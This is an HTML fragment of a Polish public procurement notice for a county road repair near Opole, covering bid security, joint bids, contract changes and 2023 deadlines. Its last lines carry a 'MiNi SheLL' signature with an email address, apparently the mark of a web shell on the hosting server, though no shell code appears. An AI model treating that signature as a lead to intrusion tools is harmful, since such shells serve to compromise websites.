125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez zamawiającego, o których mowa w art. 109 ust. 1 pkt 6 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu:<br/>a) oświadczenia Wykonawcy o rocznym przychodzie Wykonawcy w obszarze objętym zamówieniem tj. w zakresie robót<br/>budowlanych, za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy – za ten okres;<br/>b) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 2 800,00 zł ( słownie: dwa tysiące osiemset złotych i<br/>zero groszy ).<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu<br/>związania ofertą z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust 2 ustawy Pzp.<br/>Wadium może być wniesione wg wyboru wykonawcy w jednej lub kilku następujących formach, w zależności od wyboru<br/>Wykonawcy:<br/>a) pieniądzu, przelewem na rachunek bankowy;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>Nazwa beneficjenta:<br/>Powiat Opolski – Zarząd Dróg Powiatowych w Opolu<br/>45-005 Opole, ul. Książąt Opolskich 27<br/>Wadium wnoszone w pieniądzu należy dokonać przed terminem składania ofert przelewem na rachunek Zamawiającego nr<br/>94 1020 3668 0000 5902 0015 8857<br/>z dopiskiem: &#34;Wadium dot. „Remont drogi w m. Ligota Prószkowska”<br/>- dot. zam. nr SZ.261.1.18.2023.EW,<br/>a dowód przelewu złożyć wraz z ofertą.<br/>3. Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale w postaci elektronicznej i musi<br/>obejmować cały okres związania ofertą. W przypadku wniesienia wadium w formie gwarancji lub poręczenia koniecznym<br/>jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium,<br/>określone w art. 98 ust. 6 ustawy Pzp.<br/>Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu<br/>do zapłaty na rzecz Zamawiającego kwoty wadium.<br/>Gwarancja lub poręczenie powinno zawierać w swojej treści wskazanie adresu<br/>e-mail lub adresu pocztowego na który Zamawiający prześle oświadczenie<br/>o zwolnieniu wadium.<br/>Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium<br/>wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione.<br/>Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą<br/>rozstrzygane zgodnie z prawem polskim przez sądy powszechne . W przypadku gdy Wykonawca wnosi wadium w formie<br/>gwarancji lub poręczenia w języku innym niż język polski, dokument gwarancji lub poręczenia należy złożyć wraz z<br/>tłumaczeniem na język polski.<br/>4. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 2 ppkt a rachunek<br/>bankowy Zamawiającego, najpóźniej przed upływem terminu składania ofert. O wpłaceniu wadium w formie pieniężnej w<br/>wymaganym terminie decyduje data i godzina wpływu środków na rachunek bankowy Zamawiającego dlatego ze względu<br/>na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze<br/>stosownym wyprzedzeniem. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej<br/>spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedłożą wraz z ofertą stosowne pełnomocnictwo. Nie<br/>dotyczy to spółki cywilnej, o ile upoważnienie/ pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>Pełnomocnictwo, o którym mowa powyżej, może wynikać albo z dokumentu pod taką nazwą albo z umowy podmiotów<br/>wspólnie składających ofertę (dołączonej do oferty).<br/>3. Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia.<br/>4. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w<br/>art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia<br/>te<br/>potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. Żaden z Wykonawców wspólnie<br/>składających ofertę nie może podlegać wykluczeniu z postępowania, co oznacza, iż oświadczenie w tym zakresie musi<br/>złożyć każdy z Wykonawców składających ofertę wspólną. Oświadczenie o spełnieniu warunków udziału składa podmiot,<br/>który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnienie.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy.<br/>6. Dopuszcza się, aby wadium zostało wniesione przez pełnomocnika ( lidera) lub jeden z podmiotów wspólnie<br/>ubiegających się o udzielenie zamówienia, przy czym jeżeli wadium zostanie wniesione w formie innej niż pieniądz, z treści<br/>dokumentu wadium musi wynikać, iż zabezpiecza ono ofertę złożoną przez wszystkich Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zawarto w proponowanych postanowieniach umowy w sprawie zamówienia publicznego (Tom II SWZ).<br/>1. Wszelkie zmiany i uzupełnienia treści Umowy, z wyjątkiem wprowadzonych zgodnie z § 7 ust. 3 i ust. 10, § 8 ust. 6 oraz §<br/>10 ust. 4 Umowy, mogą być dokonywane wyłącznie w formie pisemnej – aneksem, podpisanym przez obie Strony pod<br/>rygorem nieważności.<br/>2. Zmiana Umowy może być dokonana w przypadku:<br/>1) zaistnienia warunków atmosferycznych na terenie budowy uniemożliwiających realizację robót w okresie ich<br/>występowania, co może być podstawą do przyznania dodatkowego czasu na ukończenie o długości równoważnej z<br/>długością występowania wyżej opisanych warunków atmosferycznych lub czasu w jakim realizacja tych robót była<br/>uniemożliwiona z powodu wystąpienia takowych warunków atmosferycznych;<br/>2) wystąpienia opóźnień leżących po stronie zewnętrznych instytucji, urzędów i organów administracyjnych, co może być<br/>podstawą do przyznania dodatkowego czasu o długości równoważnej z zaistniałym opóźnieniem;<br/>3) zaistnienia konieczności zmiany terminu w związku z natrafieniem przez Wykonawcę na urządzenia podziemne<br/>uprzednio niezinwentaryzowane, niewybuchy, niewypały - o czas równoważny z zaistniałym opóźnieniem z tego powodu;<br/>4) zmiany stawki podatku VAT;<br/>5) zmiany oznaczenie danych dotyczących Zamawiającego i/lub Wykonawcy, z wyjątkiem zmiany numeru rachunku<br/>bankowego Wykonawcy, która to zmiana nie wymaga sporządzenia aneksu do Umowy, a jedynie przekazania przez<br/>Wykonawcę oświadczenia w formie pisemnej o takiej zmianie;<br/>6) zmiany zakresu części zamówienia powierzonej do wykonania przez podwykonawców;<br/>7) zmiany albo rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach<br/>określonych w art. 118 ust. 1, w celu wykazania spełniania warunków udziału w postępowaniu pod warunkiem, że<br/>proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na<br/>którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia oraz w stosunku, do nowego<br/>podwykonawcy nie zachodzą okoliczności, o których mowa w art. 108 ust. 1 ustawy Prawo zamówień publicznych;<br/>8) w sytuacji zaistnienia wpływu okoliczności związanych z wystąpieniem pandemii, w tym COVID-19 (wirus SARS-CoV-2)<br/>lub wprowadzenia w Polsce stanu epidemii lub stanu wyjątkowego, na należyte wykonanie niniejszej Umowy, pod<br/>warunkiem potwierdzenia wystąpienia tego wpływu przez Wykonawcę stosownymi oświadczeniami lub dokumentami.<br/>Zmiana taka może w szczególności dotyczyć:<br/>- zmiany Terminu Wykonania Przedmiotu Umowy lub jej części, lub czasowego zawieszenia wykonywania Umowy lub jej<br/>części,<br/>- zmiany sposobu wykonywania robót,<br/>- zmiany zakresu świadczenia Wykonawcy i odpowiadającą jej zmianę wynagrodzenia Wykonawcy;<br/>9) w przypadku zaistnienia okoliczności uzasadniających zmianę niniejszej Umowy, a mogących skutkować koniecznością<br/>zlecenia robót dodatkowych lub zamiennych lub zaniechania robót;<br/>10) wprowadzenia w życie po dacie podpisania Umowy Regulacji prawnych wywołujących potrzebę zmiany Umowy wraz ze<br/>skutkami wprowadzenia takiej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-01 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego” udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”. Sposób złożenia oferty opisany został w pkt. 12.2 IDW oraz w pkt. 17 IDW.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-01 08:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w stosunku do którego zachodzi którakolwiek z<br/>okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego na okres trwania<br/>tychże okoliczności (na podstawie art. 22 ustawy z dnia 13 kwietnia 2022 roku o której mowa powyżej).

Creat By MiNi SheLL
Email: jattceo@gmail.com